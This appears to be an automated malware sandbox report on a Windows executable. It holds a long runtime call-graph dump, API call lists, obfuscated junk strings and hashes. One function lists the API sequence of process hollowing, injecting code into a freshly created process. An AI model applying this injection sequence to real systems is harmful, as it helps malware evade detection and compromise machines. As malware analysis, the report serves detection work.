20330 40be92 20329->20330 20333 4089d9 __encode_pointer 6 API calls 20330->20333 20331 40be5c 20331->20326 20335 40ab7f __realloc_crt 73 API calls 20331->20335 20336 40be72 20331->20336 20332 40be38 20332->20328 20332->20331 20354 40ab7f 20332->20354 20333->20326 20335->20336 20336->20326 20337 4089d9 __encode_pointer 6 API calls 20336->20337 20337->20328 20403 407045 20338->20403 20342 40f5f7 __mtinitlocknum 20341->20342 20343 40f624 20342->20343 20344 40f607 20342->20344 20346 40f665 HeapSize 20343->20346 20348 40656d __lock 67 API calls 20343->20348 20345 405968 _strcat_s 67 API calls 20344->20345 20347 40f60c 20345->20347 20350 40f61c __mtinitlocknum 20346->20350 20349 4081e2 _strcat_s 6 API calls 20347->20349 20351 40f634 ___sbh_find_block 20348->20351 20349->20350 20350->20332 20359 40f685 20351->20359 20358 40ab88 20354->20358 20356 40abc7 20356->20331 20357 40aba8 Sleep 20357->20358 20358->20356 20358->20357 20363 40d9ca 20358->20363 20362 406493 LeaveCriticalSection 20359->20362 20361 40f660 20361->20346 20361->20350 20362->20361 20364 40d9d6 __mtinitlocknum 20363->20364 20365 40d9eb 20364->20365 20366 40d9dd 20364->20366 20368 40d9f2 20365->20368 20369 40d9fe 20365->20369 20367 40d900 _malloc 67 API calls 20366->20367 20385 40d9e5 __dosmaperr __mtinitlocknum 20367->20385 20370 407e83 ___freetlocinfo 67 API calls 20368->20370 20377 40db70 20369->20377 20398 40da0b ___sbh_resize_block _realloc ___sbh_find_block 20369->20398 20370->20385 20371 40dba3 20373 409a7a __calloc_impl 6 API calls 20371->20373 20372 40db75 HeapReAlloc 20372->20377 20372->20385 20375 40dba9 20373->20375 20374 40656d __lock 67 API calls 20374->20398 20376 405968 _strcat_s 67 API calls 20375->20376 20376->20385 20377->20371 20377->20372 20378 40dbc7 20377->20378 20379 409a7a __calloc_impl 6 API calls 20377->20379 20382 40dbbd 20377->20382 20380 405968 _strcat_s 67 API calls 20378->20380 20378->20385 20379->20377 20383 40dbd0 GetLastError 20380->20383 20384 405968 _strcat_s 67 API calls 20382->20384 20383->20385 20387 40db3e 20384->20387 20385->20358 20386 40da96 HeapAlloc 20386->20398 20387->20385 20389 40db43 GetLastError 20387->20389 20388 40daeb HeapReAlloc 20388->20398 20389->20385 20390 40a281 ___sbh_alloc_block 5 API calls 20390->20398 20391 40db56 20391->20385 20393 405968 _strcat_s 67 API calls 20391->20393 20392 409a7a __calloc_impl 6 API calls 20392->20398 20395 40db63 20393->20395 20394 409ad2 VirtualFree VirtualFree HeapFree __VEC_memcpy ___sbh_free_block 20394->20398 20395->20383 20395->20385 20396 40db39 20397 405968 _strcat_s 67 API calls 20396->20397 20397->20387 20398->20371 20398->20374 20398->20385 20398->20386 20398->20388 20398->20390 20398->20391 20398->20392 20398->20394 20398->20396 20399 40db0e 20398->20399 20402 406493 LeaveCriticalSection 20399->20402 20401 40db15 20401->20398 20402->20401 20406 406493 LeaveCriticalSection 20403->20406 20405 40704c 20405->20317 20406->20405 20408 404546 SetLastError 20407->20408 20409 404551 20408->20409 20410 40455a 20408->20410 20409->20408 20409->20410 20411 404566 FindNextVolumeMountPointA EnumTimeFormatsW 20410->20411 20432 4045af 20410->20432 20447 404d1d 20411->20447 20412 404616 VirtualAlloc 20417 404650 GetLastError 20412->20417 20413 4045ce GetDllDirectoryW OpenJobObjectA InterlockedExchangeAdd 20415 40503e ___ansicp 91 API calls 20413->20415 20428 4045fb 20415->20428 20417->20417 20423 40465b 20417->20423 20419 40458b 20465 405361 20419->20465 20420 4046f6 20424 404716 LCMapStringA InterlockedIncrement OpenEventW 20420->20424 20426 404747 20420->20426 20422 4046a2 8 API calls 20422->20423 20423->20420 20423->20422 20424->20420 20425 404594 20478 404c00 20425->20478 20440 404420 20426->20440 20428->20412 20430 40474c 20431 40475e GetCurrentProcess 20430->20431 20433 404771 20430->20433 20431->20430 20432->20412 20432->20413 20434 404773 GetLastError 20433->20434 20435 40479a 20433->20435 20434->20433 20436 4047bf GetFileAttributesA GetShortPathNameW SetComputerNameExA FreeEnvironmentStringsW GetComputerNameA 20435->20436 20437 4047f7 InterlockedExchange 20435->20437 20438 404809 LoadLibraryW 20435->20438 20436->20435 20437->20435 20439 40481a 20438->20439 20439->20256 20441 40442d __write_nolock 20440->20441 20442 404514 20441->20442 20443 404443 20441->20443 20442->20430 20444 404470 12 API calls 20443->20444 20446 404511 20443->20446 20489 404250 20443->20489 20444->20443 20446->20442 20448 4059b1 __calloc_impl 67 API calls 20447->20448 20449 404d37 20448->20449 20450 404585 20449->20450 20451 405968 _strcat_s 67 API calls 20449->20451 20454 404fe2 20450->20454 20452 404d4a 20451->20452 20452->20450 20453 405968 _strcat_s 67 API calls 20452->20453 20453->20450 20455 404fee __mtinitlocknum 20454->20455 20456 404ff5 20455->20456 20457 404ffe 20455->20457 20496 404f08 20456->20496 20506 406671 20457->20506 20463 404ffb __mtinitlocknum 20463->20419 20466 40536d __mtinitlocknum 20465->20466 20467 405381 20466->20467 20468 40539e 20466->20468 20469 405968 _strcat_s 67 API calls 20467->20469 20471 406671 __lock_file 68 API calls 20468->20471 20475 405396 __mtinitlocknum 20468->20475 20470 405386 20469->20470 20472 4081e2 _strcat_s 6 API calls 20470->20472 20473 4053b6 20471->20473 20472->20475 20732 4052ea 20473->20732 20475->20425 20479 405851 __ctrlfp __floor_pentium4 20478->20479 20480 404c0d 20478->20480 20482 4058be __floor_pentium4 20479->20482 20485 40589b 20479->20485 20486 4058ab __ctrlfp 20479->20486 20480->20479 20481 404c3e 20480->20481 20487 404c88 20481->20487 20806 40558d 20481->20806 20482->20486 20822 409735 20482->20822 20815 4096e0 20485->20815 20486->20432 20487->20432 20490 404287 20489->20490 20491 4042e3 SetFileAttributesW 20490->20491 20492 404324 GetCommConfig 20490->20492 20493 40433f 9 API calls 20490->20493 20494 4043c4 GlobalUnWire 20490->20494 20495 404403 20490->20495 20491->20490 20492->20490 20493->20490 20494->20490 20495->20443 20497 404f14 __mtinitlocknum 20496->20497 20498 40656d __lock 67 API calls 20497->20498 20504 404f23 20498->20504 20499 404fbb 20533 404fd9 20499->20533 20502 404fc7 __mtinitlocknum 20502->20463 20504->20499 20505 404ec0 102 API calls __fflush_nolock 20504->20505 20525 4066b2 20504->20525 20530 404faa 20504->20530 20505->20504 20507 406683 20506->20507 20508 4066a5 EnterCriticalSection 20506->20508 20507->20508 20509 40668b 20507->20509 20510 405006 20508->20510 20511 40656d __lock 67 API calls 20509->20511 20512 404ec0 20510->20512 20511->20510 20513 404ed6 20512->20513 20514 404ecd 20512->20514 20543 404e58 20513->20543 20516 404f08 _flsall 102 API calls 20514->20516 20518 404ed3 20516->20518 20522 40502b 20518->20522 20725 4066e4 20522->20725 20524 405033 20524->20463 20526 4066d5 EnterCriticalSection 20525->20526 20527 4066bf 20525->20527 20526->20504 20528 40656d __lock 67 API calls 20527->20528 20529 4066c8 20528->20529 20529->20504 20536 406720 20530->20536 20532 404fb8 20532->20504 20542 406493 LeaveCriticalSection 20533->20542 20535 404fe0 20535->20502 20537 406730 20536->20537 20538 406743 LeaveCriticalSection 20536->20538 20541 406493 LeaveCriticalSection 20537->20541 20538->20532 20540 406740 20540->20532 20541->20540 20542->20535 20544 404e71 20543->20544 20548 404e93 20543->20548 20545 4062de __fileno 67 API calls 20544->20545 20544->20548 20546 404e8c 20545->20546 20577 406202 20546->20577 20548->20518 20549 4062de 20548->20549 20550 404ef5 20549->20550 20551 4062ed 20549->20551 20555 406310 20550->20555 20552 405968 _strcat_s 67 API calls 20551->20552 20553 4062f2 20552->20553 20554 4081e2 _strcat_s 6 API calls 20553->20554 20554->20550 20556 40631c __mtinitlocknum 20555->20556 20557 406324 20556->20557 20558 406337 20556->20558 20559 405968 _strcat_s 67 API calls 20557->20559 20560 406345 20558->20560 20562 40637f 20558->20562 20565 406329 __mtinitlocknum 20559->20565 20561 405968 _strcat_s 67 API calls 20560->20561 20563 40634a 20561->20563 20564 40a9b8 ___lock_fhandle 68 API calls 20562->20564 20566 4081e2 _strcat_s 6 API calls 20563->20566 20567 406385 20564->20567 20565->20518 20566->20565 20568 4063be 20567->20568 20569 40a941 __close_nolock 67 API calls 20567->20569 20570 405968 _strcat_s 67 API calls 20568->20570 20571 40639a FlushFileBuffers 20569->20571 20572 4063c8 20570->20572 20573 4063b1 20571->20573 20574 4063a6 GetLastError 20571->20574 20721 4063e7 20572->20721 20573->20572 20576 40597b __commit 67 API calls 20573->20576 20574->20573 20576->20568 20578 40620e __mtinitlocknum 20577->20578 20579 406231 20578->20579 20580 406216 20578->20580 20582 40623f 20579->20582 20586 406280 20579->20586 20602 40597b 20580->20602 20584 40597b __commit 67 API calls 20582->20584 20585 406244 20584->20585 20588 405968 _strcat_s 67 API calls 20585->20588 20605 40a9b8 20586->20605 20587 405968 _strcat_s 67 API calls 20595 406223 __mtinitlocknum 20587->20595 20590 40624b 20588->20590 20592 4081e2 _strcat_s 6 API calls 20590->20592 20591 406286 20593 406293 20591->20593 20594 4062a9 20591->20594 20592->20595 20615 405acf 20593->20615 20597 405968 _strcat_s 67 API calls 20594->20597 20595->20548 20599 4062ae 20597->20599 20598 4062a1 20670 4062d4 20598->20670 20600 40597b __commit 67 API calls 20599->20600 20600->20598 20603 408c27 __getptd_noexit 67 API calls 20602->20603 20604 405980 20603->20604 20604->20587 20606 40a9c4 __mtinitlocknum 20605->20606 20607 40aa1f 20606->20607 20609 40656d __lock 67 API calls 20606->20609 20608 40aa24 EnterCriticalSection 20607->20608 20610 40aa41 __mtinitlocknum 20607->20610 20608->20610 20611 40a9f0 20609->20611 20610->20591 20612 40aa07 20611->20612 20614 40aa8e __mtinitlocknum InitializeCriticalSectionAndSpinCount 20611->20614 20673 40aa4f 20612->20673 20614->20612 20616 405ade __write_nolock 20615->20616 20617 405b10 20616->20617 20618 405b37 20616->20618 20647 405b05 20616->20647 20619 40597b __commit 67 API calls 20617->20619 20622 405b9f 20618->20622 20623 405b79 20618->20623 20621 405b15 20619->20621 20620 407750 __invoke_watson 5 API calls 20624 406200 20620->20624 20626 405968 _strcat_s 67 API calls 20621->20626 20625 405bb3 20622->20625 20677 40a80b 20622->20677 20627 40597b __commit 67 API calls 20623->20627 20624->20598 20687 40a7a7 20625->20687 20629 405b1c 20626->20629 20631 405b7e 20627->20631 20632 4081e2 _strcat_s 6 API calls 20629->20632 20634 405968 _strcat_s 67 API calls 20631->20634 20632->20647 20633 405bbe 20635 405e64 20633->20635 20639 408ca0 __getptd 67 API calls 20633->20639 20636 405b87 20634->20636 20638 406133 WriteFile 20635->20638 20642 405f52 20635->20642 20659 405e88 20635->20659 20637 4081e2 _strcat_s 6 API calls 20636->20637 20637->20647 20640 405e46 20638->20640 20641 406166 GetLastError 20638->20641 20643 405bd9 GetConsoleMode 20639->20643 20645 4061b1 20640->20645 20640->20647 20650 406184 20640->20650 20641->20640 20644 406032 20642->20644 20661 405f61 20642->20661 20643->20635 20646 405c04 20643->20646 20644->20638 20644->20645 20645->20647 20649 405968 _strcat_s 67 API calls 20645->20649 20646->20635 20648 405c16 GetConsoleCP 20646->20648 20647->20620 20648->20640 20668 405c39 20648->20668 20651 4061d4 20649->20651 20652 4061a3 20650->20652 20653 40618f 20650->20653 20655 40597b __commit 67 API calls 20651->20655 20699 40598e 20652->20699 20656 405968 _strcat_s 67 API calls 20653->20656 20654 405ef6 WriteFile 20654->20641 20654->20659 20655->20647 20660 406194 20656->20660 20658 405fd6 WriteFile 20658->20641 20658->20661 20659->20640 20659->20645 20659->20654 20663 40597b __commit 67 API calls 20660->20663 20661->20640 20661->20645 20661->20658 20663->20647 20664 40a742 79 API calls __fassign 20664->20668 20665 405ce5 WideCharToMultiByte 20665->20640 20666 405d16 WriteFile 20665->20666 20666->20641 20666->20668 20667 40a566 11 API calls __putwch_nolock 20667->20668 20668->20640 20668->20641 20668->20664 20668->20665 20668->20667 20669 405d6a WriteFile 20668->20669 20696 40a794 20668->20696 20669->20641 20669->20668 20720 40aa58 LeaveCriticalSection 20670->20720 20672 4062dc 20672->20595 20676 406493 LeaveCriticalSection 20673->20676 20675 40aa56 20675->20607 20676->20675 20704 40a941 20677->20704 20679 40a829 20680 40a831 20679->20680 20681 40a842 SetFilePointer 20679->20681 20684 405968 _strcat_s 67 API calls 20680->20684 20682 40a85a GetLastError 20681->20682 20683 40a836 20681->20683 20682->20683 20685 40a864 20682->20685 20683->20625 20684->20683 20686 40598e __dosmaperr 67 API calls 20685->20686 20686->20683 20688 40a7c3 20687->20688 20689 40a7b4 20687->20689 20692 405968 _strcat_s 67 API calls 20688->20692 20695 40a7e7 20688->20695 20690 405968 _strcat_s 67 API calls 20689->20690 20691 40a7b9 20690->20691 20691->20633 20693 40a7d7 20692->20693 20694 4081e2 _strcat_s 6 API calls 20693->20694 20694->20695 20695->20633 20717 40a75c 20696->20717 20700 40597b __commit 67 API calls 20699->20700 20701 405999 __dosmaperr 20700->20701 20702 405968 _strcat_s 67 API calls 20701->20702 20703 4059ac 20702->20703 20703->20647 20705 40a94e 20704->20705 20707 40a966 20704->20707 20706 40597b __commit 67 API calls 20705->20706 20708 40a953 20706->20708 20709 40597b __commit 67 API calls 20707->20709 20711 40a9ab 20707->20711 20710 405968 _strcat_s 67 API calls 20708->20710 20712 40a994 20709->20712 20713 40a95b 20710->20713 20711->20679 20714 405968 _strcat_s 67 API calls 20712->20714 20713->20679 20715 40a99b 20714->20715 20716 4081e2 _strcat_s 6 API calls 20715->20716 20716->20711 20718 40693c _LocaleUpdate::_LocaleUpdate 77 API calls 20717->20718 20719 40a76f 20718->20719 20719->20668 20720->20672 20724 40aa58 LeaveCriticalSection 20721->20724 20723 4063ef 20723->20565 20724->20723 20726 406714 LeaveCriticalSection 20725->20726 20727 4066f5 20725->20727 20726->20524 20727->20726 20728 4066fc 20727->20728 20731 406493 LeaveCriticalSection 20728->20731 20730 406711 20730->20524 20731->20730 20733 40531a 20732->20733 20734 4052fe 20732->20734 20736 405313 20733->20736 20738 404e58 __flush 98 API calls 20733->20738 20735 405968 _strcat_s 67 API calls 20734->20735 20737 405303 20735->20737 20748 4053d5 20736->20748 20739 4081e2 _strcat_s 6 API calls 20737->20739 20740 405326 20738->20740 20739->20736 20751 40807a 20740->20751 20743 4062de __fileno 67 API calls 20744 405334 20743->20744 20755 407fad 20744->20755 20746 40533a 20746->20736 20747 407e83 ___freetlocinfo 67 API calls 20746->20747 20747->20736 20749 4066e4 __fcloseall 2 API calls 20748->20749 20750 4053db 20749->20750 20750->20475 20752 40532e 20751->20752 20753 40808a 20751->20753 20752->20743 20753->20752 20754 407e83 ___freetlocinfo 67 API calls 20753->20754 20754->20752 20756 407fb9 __mtinitlocknum 20755->20756 20757 407fc1 20756->20757 20758 407fdc 20756->20758 20759 40597b __commit 67 API calls 20757->20759 20760 407fea 20758->20760 20763 40802b 20758->20763 20761 407fc6 20759->20761 20762 40597b __commit 67 API calls 20760->20762 20764 405968 _strcat_s 67 API calls 20761->20764 20765 407fef 20762->20765 20766 40a9b8 ___lock_fhandle 68 API calls 20763->20766 20767 407fce __mtinitlocknum 20764->20767 20768 405968 _strcat_s 67 API calls 20765->20768 20769 408031 20766->20769 20767->20746 20770 407ff6 20768->20770 20771 40804c 20769->20771 20772 40803e 20769->20772 20773 4081e2 _strcat_s 6 API calls 20770->20773 20775 405968 _strcat_s 67 API calls 20771->20775 20778 407f11 20772->20778 20773->20767 20776 408046 20775->20776 20793 408070 20776->20793 20779 40a941 __close_nolock 67 API calls 20778->20779 20782 407f21 20779->20782 20780 407f77 20796 40a8bb 20780->20796 20782->20780 20784 40a941 __close_nolock 67 API calls 20782->20784 20792 407f55 20782->20792 20783 40a941 __close_nolock 67 API calls 20786 407f61 CloseHandle 20783->20786 20785 407f4c 20784->20785 20789 40a941 __close_nolock 67 API calls 20785->20789 20786->20780 20790 407f6d GetLastError 20786->20790 20787 407fa1 20787->20776 20789->20792 20790->20780 20791 40598e __dosmaperr 67 API calls 20791->20787 20792->20780 20792->20783 20805 40aa58 LeaveCriticalSection 20793->20805 20795 408078 20795->20767 20797 40a927 20796->20797 20798 40a8cc 20796->20798 20799 405968 _strcat_s 67 API calls 20797->20799 20798->20797 20803 40a8f7 20798->20803 20800 40a92c 20799->20800 20801 40597b __commit 67 API calls 20800->20801 20802 407f7f 20801->20802 20802->20787 20802->20791 20803->20802 20804 40a917 SetStdHandle 20803->20804 20804->20802 20805->20795 20807 4055c3 20806->20807 20811 4055ce 20806->20811 20808 408a54 __decode_pointer 6 API calls 20807->20808 20808->20811 20809 4056a5 20810 405661 20809->20810 20813 405968 _strcat_s 67 API calls 20809->20813 20810->20487 20811->20809 20811->20810 20812 40561f 20811->20812 20812->20810 20814 405968 _strcat_s 67 API calls 20812->20814 20813->20810 20814->20810 20816 409716 20815->20816 20817 4096ee 20815->20817 20818 405968 _strcat_s 67 API calls 20816->20818 20833 409640 20817->20833 20820 40971b __ctrlfp 20818->20820 20820->20486 20821 409711 20821->20486 20823 40976b __handle_exc 20822->20823 20825 409791 __except1 20823->20825 20848 4093da 20823->20848 20826 4097d3 20825->20826 20828 4097ac 20825->20828 20827 4095df __umatherr 67 API calls 20826->20827 20830 4097ce __ctrlfp 20827->20830 20829 409640 __umatherr 67 API calls 20828->20829 20829->20830 20831 407750 __invoke_watson 5 API calls 20830->20831 20832 4097f7 20831->20832 20832->20486 20834 40964a 20833->20834 20835 4096c3 __ctrlfp 20834->20835 20839 409665 __umatherr __ctrlfp 20834->20839 20836 4095df __umatherr 67 API calls 20835->20836 20837 4096d8 20836->20837 20837->20821 20838 4096b3 20838->20821 20839->20838 20841 4095df 20839->20841 20842 4095ff 20841->20842 20844 4095ea 20841->20844 20843 405968 _strcat_s 67 API calls 20842->20843 20845 409604 20843->20845 20844->20845 20846 405968 _strcat_s 67 API calls 20844->20846 20845->20838 20847 4095f7 20846->20847 20847->20838 20851 4090fe 20848->20851 20852 409125 __raise_exc_ex 20851->20852 20853 409318 RaiseException 20852->20853 20854 409331 20853->20854 20854->20825 20856 407120 __mtinitlocknum 20855->20856 20857 40656d __lock 67 API calls 20856->20857 20858 407127 20857->20858 20861 408a54 __decode_pointer 6 API calls 20858->20861 20865 4071e0 __initterm 20858->20865 20863 40715e 20861->20863 20862 407228 __mtinitlocknum 20862->20269 20863->20865 20867 408a54 __decode_pointer 6 API calls 20863->20867 20872 40722b 20865->20872 20866 40721f 20868 407024 __mtinitlocknum 3 API calls 20866->20868 20871 407173 20867->20871 20868->20862 20869 408a4b 6 API calls _doexit 20869->20871 20870 408a54 6 API calls __decode_pointer 20870->20871 20871->20865 20871->20869 20871->20870 20873 407231 20872->20873 20874 40720c 20872->20874 20877 406493 LeaveCriticalSection 20873->20877 20874->20862 20876 406493 LeaveCriticalSection 20874->20876 20876->20866 20877->20874

                                                                  Executed Functions

                                                                  Function 00404530 Relevance: 70.2, APIs: 30, Strings: 10, Instructions: 223librarymemorytimeCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 0 404530-404544 1 404546-40454f SetLastError 0->1 2 404551-404558 1->2 3 40455a-404564 1->3 2->1 2->3 4 4045c2-4045cc 3->4 5 404566-4045bf FindNextVolumeMountPointA EnumTimeFormatsW call 404d1d call 404fe2 call 405361 call 40506a call 404c00 call 4051d0 3->5 6 404616-40464a VirtualAlloc 4->6 7 4045ce-404613 GetDllDirectoryW OpenJobObjectA InterlockedExchangeAdd call 40503e call 405054 call 404520 call 4051a7 4->7 5->4 11 404650-404659 GetLastError 6->11 7->6 11->11 14 40465b-404666 11->14 17 4046f8-404704 14->17 18 40466c-40467e 14->18 19 404706-404714 17->19 22 404680-4046a0 18->22 25 404716-404738 LCMapStringA InterlockedIncrement OpenEventW 19->25 26 40473e-404745 19->26 23 4046a2-4046e7 InterlockedExchange GetDiskFreeSpaceExW SetConsoleCP GetSystemDefaultLCID OutputDebugStringW GetUserDefaultLangID LoadLibraryW ReadConsoleInputA 22->23 24 4046ea-4046f4 22->24 23->24 24->22 29 4046f6 24->29 25->26 26->19 30 404747-404754 call 404420 26->30 29->17 39 404756-40475c 30->39 41 404760-404766 39->41 42 40475e GetCurrentProcess 39->42 45 404771 41->45 46 404768-40476f 41->46 42->41 47 404773-40477c GetLastError 45->47 46->39 46->45 48 404791-404798 47->48 49 40477e-40478b 47->49 48->47 50 40479a-4047ac 48->50 49->48 51 4047b3-4047bd 50->51 52 4047ee-4047f5 51->52 53 4047bf-4047e8 GetFileAttributesA GetShortPathNameW SetComputerNameExA FreeEnvironmentStringsW GetComputerNameA 51->53 54 404803-404807 52->54 55 4047f7-4047fd InterlockedExchange 52->55 53->52 54->51 56 404809-40480e LoadLibraryW 54->56 55->54 57 40481a-404820 56->57
                                                                  APIs
                                                                  • SetLastError.KERNEL32(00000000), ref: 00404547
                                                                  • FindNextVolumeMountPointA.KERNEL32(00000000,?,00000000), ref: 0040456F
                                                                  • EnumTimeFormatsW.KERNEL32(00000000,00000000,00000000), ref: 00404578
                                                                  • _calloc.LIBCMT ref: 00404580
                                                                  • __floor_pentium4.LIBCMT ref: 004045AA
                                                                  • GetDllDirectoryW.KERNEL32(00000000,00000000), ref: 004045D7
                                                                  • OpenJobObjectA.KERNEL32(00000000,00000000,sokum), ref: 004045E4
                                                                  • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004045EF
                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0040463A
                                                                  • GetLastError.KERNEL32 ref: 00404650
                                                                  • InterlockedExchange.KERNEL32(00000000,00000000), ref: 004046A6
                                                                  • GetDiskFreeSpaceExW.KERNEL32(00000000,00000000,00000000,00000000), ref: 004046B4
                                                                  • SetConsoleCP.KERNEL32(00000000), ref: 004046B8
                                                                  • GetSystemDefaultLCID.KERNEL32 ref: 004046BA
                                                                  • OutputDebugStringW.KERNEL32(00000000), ref: 004046BE
                                                                  • GetUserDefaultLangID.KERNEL32 ref: 004046C4
                                                                  • LoadLibraryW.KERNEL32(roxahiramarorada xegesapipojobozomamele kotunacotebak hufobikoxexolavav), ref: 004046CF
                                                                  • ReadConsoleInputA.KERNEL32(00000000,?,00000000,?), ref: 004046E1
                                                                  • LCMapStringA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 00404727
                                                                  • InterlockedIncrement.KERNEL32(?), ref: 0040472D
                                                                  • OpenEventW.KERNEL32(00000000,00000000,himakanesekobajawofehabaluc), ref: 00404738
                                                                  • GetCurrentProcess.KERNEL32 ref: 0040475E
                                                                  • GetLastError.KERNEL32 ref: 00404773
                                                                  • GetFileAttributesA.KERNEL32(rafubajijovisatafesohadiko dibagirosowocutivutiyete jodanevudafuzabasukaropecevemus fuvocarujekahitave kobaxofoboficejonakoropi), ref: 004047C4
                                                                  • GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 004047D1
                                                                  • SetComputerNameExA.KERNEL32(00000000,kezabohujocozebiwaviracabivolezagecudugefucuhevufofoturulivozevulewiliyudo), ref: 004047DA
                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004047DE
                                                                  • GetComputerNameA.KERNEL32(00000000,00000000), ref: 004047E8
                                                                  • InterlockedExchange.KERNEL32(?,00000000), ref: 004047FD
                                                                  • LoadLibraryW.KERNELBASE(msimg32.dll), ref: 0040480E
                                                                  Strings
                                                                  • P, xrefs: 004045FF
                                                                  • kezabohujocozebiwaviracabivolezagecudugefucuhevufofoturulivozevulewiliyudo, xrefs: 004047D3
                                                                  • msimg32.dll, xrefs: 00404809
                                                                  • {, xrefs: 004047AC
                                                                  • himakanesekobajawofehabaluc, xrefs: 0040472F
                                                                  • rafubajijovisatafesohadiko dibagirosowocutivutiyete jodanevudafuzabasukaropecevemus fuvocarujekahitave kobaxofoboficejonakoropi, xrefs: 004047BF
                                                                  • Bq , xrefs: 00404760
                                                                  • roxahiramarorada xegesapipojobozomamele kotunacotebak hufobikoxexolavav, xrefs: 004046CA
                                                                  • sokum, xrefs: 004045DD
                                                                  • ]{, xrefs: 00404781
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816651678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1816631636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816651678.000000000042A000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816702499.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816723648.0000000000458000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816747545.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1816767087.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Interlocked$ErrorExchangeLastName$ComputerConsoleDefaultFreeLibraryLoadOpenString$AllocAttributesCurrentDebugDirectoryDiskEnumEnvironmentEventFileFindFormatsIncrementInputLangMountNextObjectOutputPathPointProcessReadShortSpaceStringsSystemTimeUserVirtualVolume__floor_pentium4_calloc
                                                                  • String ID: Bq $]{$himakanesekobajawofehabaluc$kezabohujocozebiwaviracabivolezagecudugefucuhevufofoturulivozevulewiliyudo$msimg32.dll$rafubajijovisatafesohadiko dibagirosowocutivutiyete jodanevudafuzabasukaropecevemus fuvocarujekahitave kobaxofoboficejonakoropi$roxahiramarorada xegesapipojobozomamele kotunacotebak hufobikoxexolavav$sokum${$P
                                                                  • API String ID: 839379277-367991866
                                                                  • Opcode ID: ca3011b4622bfdfcd854aed2c97fd6be165c65687d124ae4e0643c35a11a6e17
                                                                  • Instruction ID: 974096606b38ea26204ae26171fc8fb98f18d1e15fefc15eb9b2416e3031f752
                                                                  • Opcode Fuzzy Hash: ca3011b4622bfdfcd854aed2c97fd6be165c65687d124ae4e0643c35a11a6e17
                                                                  • Instruction Fuzzy Hash: F671D3B5900304AFD300AB64ED85F9A77B8EB48705F118076FB49B72E1C6789D458FAD
                                                                  Function 00630110 Relevance: 21.2, APIs: 14, Instructions: 248memorynativethreadCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 00630156
                                                                  • CreateProcessA.KERNELBASE(?,00000000), ref: 00630255
                                                                  • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00630270
                                                                  • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00630283
                                                                  • Wow64GetThreadContext.KERNEL32(00000000,?), ref: 0063029F
                                                                  • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 006302C8
                                                                  • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 006302E3
                                                                  • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 00630304
                                                                  • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0063032A
                                                                  • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 00630399
                                                                  • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 006303BF
                                                                  • Wow64SetThreadContext.KERNEL32(00000000,?), ref: 006303E1
                                                                  • ResumeThread.KERNELBASE(00000000), ref: 006303ED
                                                                  • ExitProcess.KERNEL32(00000000), ref: 00630412
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816901578.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Offset: 00630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFreeReadResumeSectionUnmapView
                                                                  • String ID:
                                                                  • API String ID: 3993611425-0
                                                                  • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                  • Instruction ID: c58f1aed84e77e5f6a8aa54a89c2360201f9d3ccd902219b293132fca4d5a1e3
                                                                  • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                  • Instruction Fuzzy Hash: F9B1C774A00209AFDB44CF98C895F9EBBB5FF88314F248158E509AB391D771AE45CF94
                                                                  Function 00404830 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 180COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 136 404830-404b9f 137 404ba0-404ba5 136->137 138 404ba7-404bad 137->138 139 404baf-404bbb call 404530 137->139 138->137 138->139 141 404bc0-404bcb 139->141 142 404bd0-404bda 141->142 143 404be7-404bea 142->143 144 404bdc-404be5 GetCurrentDirectoryA 142->144 143->142 145 404bec-404bf3 143->145 144->143
                                                                  APIs
                                                                  • GetCurrentDirectoryA.KERNEL32(00000000,?,?,?,394E5926,50EDA421,5B9EF562,32C13229,247B75E2,32C13229,00CF5F12,07B6604B,7A3807E7,07B6604B,5B9EF562,07C50BE0), ref: 00404BE5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1816651678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1816631636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
